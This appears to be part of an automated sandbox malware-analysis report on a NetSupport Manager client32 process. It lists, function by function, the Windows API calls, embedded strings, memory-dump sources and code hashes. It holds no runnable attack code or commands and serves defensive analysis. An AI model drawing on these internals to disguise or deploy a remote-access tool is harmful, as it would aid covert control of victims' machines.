GetSystemMetrics.USER32(0000004D,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959A7
GetSystemMetrics.USER32(0000004E,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959AE
GetSystemMetrics.USER32(00000000,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959B7
GetSystemMetrics.USER32(0000004F,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959BD
GetSystemMetrics.USER32(00000001,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959C5

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
Instruction ID: b65ab4a361e5326c91c4d36ade1d631f08c7cf5d252a1eb012e320adc1ee70d1
Opcode Fuzzy Hash: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
Instruction Fuzzy Hash: 01F030B1B4131A6BE7009FAADC41B55BB98EB48664F008037A71C87680D6B5A8108FE4

Function 1103B606 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F

Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339

Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8

GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E

Strings

pcicl32.dll, xrefs: 1103B7EE
Survey, xrefs: 1103B6B0
toastImageAndText.png, xrefs: 1103B7A8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
String ID: Survey$pcicl32.dll$toastImageAndText.png
API String ID: 2477883239-2305317391
Opcode ID: 2f90f4586e8a144a85dc65e248e3d6049d5ed08b354996f0881b37baed7ae7a3
Instruction ID: a37ee32854b15c041e991ad0c80392c526a8d8f631297bf945f8db0117e793ba
Opcode Fuzzy Hash: 2f90f4586e8a144a85dc65e248e3d6049d5ed08b354996f0881b37baed7ae7a3
Instruction Fuzzy Hash: 3871E27590465A9FE709CF64C8D8FEAB7F5EB48308F1485A9D5198B381EB30E944CB50

Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

MapWindowPoints.USER32 ref: 110773FB

Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783

EqualRect.USER32 ref: 1107740C
SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014), ref: 11077466

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
m_hWnd, xrefs: 11077447

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$DeferEqualPointsRect
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2754115966-2830328467
Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4

Function 11049690 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1104971C
_free.LIBCMT ref: 11049779

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
ReleaseSmartcardDevice called, xrefs: 110496BD
CLTCONN.CPP, xrefs: 11049708

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
API String ID: 3300666597-3188990991
Opcode ID: a96d33cc2ee08905e30f1eec18a566e6825b27c160358a4790fc3fe5e536e1e6
Instruction ID: e35be207329a9a02e71ffc0183289b31f5ea9fbf546850573bb4cc18e029b419
Opcode Fuzzy Hash: a96d33cc2ee08905e30f1eec18a566e6825b27c160358a4790fc3fe5e536e1e6
Instruction Fuzzy Hash: D041AEB5A01611AFD704CF98D880EAAFBE4FB48328F6142BDE52997350E730A940CB95

Function 1109DB40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91windowthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageA.USER32(11027105,752BF08B,68575608,11199F9C), ref: 1109DBB6
SendMessageA.USER32(00000000,752BF08B,68575608,11199F9C,000001F4,00000000,?,756F110C,?,11027105,?), ref: 1109DBEF

Part of subcall function 1109DA70: IsWindow.USER32(?), ref: 1109DA8F
Part of subcall function 1109DA70: GetClassNameA.USER32(?,?,00000040), ref: 1109DAA0
Part of subcall function 1109DA70: FindWindowA.USER32 ref: 1109DAE1
Part of subcall function 1109DA70: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,1109ED09,000001F4,00000006,?,11067720,0000048C,00000001), ref: 1109DAFC
Part of subcall function 1109DA70: FindWindowA.USER32 ref: 1109DB0D

PostMessageA.USER32 ref: 1109DC0B

Strings

m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 1109DB92
..\CTL32\ipc.cpp, xrefs: 1109DB8D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$FindPost$ClassNameSendSleepThread
String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
API String ID: 3524374798-1411620790
Opcode ID: 42afa5bf68388e51984fb1ef34060e243bf26129c8e46c14fef31d973cacd0a3
Instruction ID: f7862f93581c5bca8d7b47be27161d917c1b37376ee9b6c345dd63ee61fb1edc
Opcode Fuzzy Hash: 42afa5bf68388e51984fb1ef34060e243bf26129c8e46c14fef31d973cacd0a3
Instruction Fuzzy Hash: 0121737574060AEFD314CF59D990D6BF3E9FB88324B10852AE55A87A40D730FC50DB50

Function 11033B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 11033B3E
_strncpy.LIBCMT ref: 11033B4D
wsprintfA.USER32 ref: 11033BB4
_strncpy.LIBCMT ref: 11033C05

Strings

%s (%s), xrefs: 11033BAE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$wsprintf
String ID: %s (%s)
API String ID: 2895084632-1363028141
Opcode ID: 0030f36de6e69c1df68aa0c742c56456b93de146cc6c778061a393736ab38830
Instruction ID: 0ad2666efbab1ef8cbc868768b6c2378956e4de7a80f96389552179b7afbf64e
Opcode Fuzzy Hash: 0030f36de6e69c1df68aa0c742c56456b93de146cc6c778061a393736ab38830
Instruction Fuzzy Hash: D731AF76900B02AFC324DF65C890EA3B7A9FF88318B04455DE64A8BE40E775F464CB90

Function 111438D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetProfileStringA.KERNEL32 ref: 111438FE
_memmove.LIBCMT ref: 1114394D

Strings

Device, xrefs: 111438F4
,,LPT1:, xrefs: 111438EF
Windows, xrefs: 111438F9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProfileString_memmove
String ID: ,,LPT1:$Device$Windows
API String ID: 1665476579-2967085602
Opcode ID: 84c6e57cbd8fc4f7538afa223db3259dff3af144902b2b86f036842710f49a9f
Instruction ID: 055e85ea75ba770a70e20350d0a84ef6a9c3bf4bb9e235a47bfd0f5fb1665b7d
Opcode Fuzzy Hash: 84c6e57cbd8fc4f7538afa223db3259dff3af144902b2b86f036842710f49a9f
Instruction Fuzzy Hash: E0113B39918267AADB119F70ED41BF9FB68EF55708F1000A8DD8597242FB326609C7B2

Function 110BD470 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?,750A7EED,750A7D59,00000000,?,?,?,110BD942,750A7EED,?), ref: 110BD4A4
GetSubMenu.USER32(00000000,00000002,?,?,?,?,110BD942,750A7EED,?), ref: 110BD4E5
DrawMenuBar.USER32(?,00000000,000034BD,110BD942,00000000,?,?,?,?,110BD942,750A7EED,?), ref: 110BD50D

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E
m_hWnd, xrefs: 110BD493

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 381722633-2830328467
Opcode ID: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
Instruction ID: 2ed85e2a360b3d02c99ae53d45e4f65cdbccb9b7267b746ab424cefae630bdcb
Opcode Fuzzy Hash: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
Instruction Fuzzy Hash: 9B1151BAE00219AFCB04DFA5C894CAFF7B9BF49308B00457EE11697254DB74AD05CB94

Function 1102D750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
InterlockedIncrement.KERNEL32(111EE418,Audio,HookDirectSound,00000000,00000000), ref: 1102D799
InterlockedDecrement.KERNEL32(111EE418,Audio,HookDirectSound,00000000,00000000), ref: 1102D7C0

Strings

EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked$DecrementIncrementVersion
String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
API String ID: 1284810544-229394064
Opcode ID: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
Opcode Fuzzy Hash: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1

Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
LoadIconA.USER32(1109350C,00002716), ref: 11093456
LoadCursorA.USER32(00000000,00007F00), ref: 11093465
RegisterClassA.USER32(?), ref: 11093483

Strings

NSMClassList, xrefs: 1109341E, 1109347C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassLoad$CursorIconInfoRegister
String ID: NSMClassList
API String ID: 2883182437-2474587545
Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5

Function 11145660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 11145678
wsprintfA.USER32 ref: 1114568E

Strings

i < cchBuf, xrefs: 111456A5
#%d, xrefs: 11145688
..\ctl32\util.cpp, xrefs: 111456A0

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LoadStringwsprintf
String ID: #%d$..\ctl32\util.cpp$i < cchBuf
API String ID: 104907563-3240211118
Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9

Function 11145450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 11145463
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage,?,11037F05), ref: 11145475
FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485

Strings

GetUserDefaultUILanguage, xrefs: 1114546F
kernel32.dll, xrefs: 1114545C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
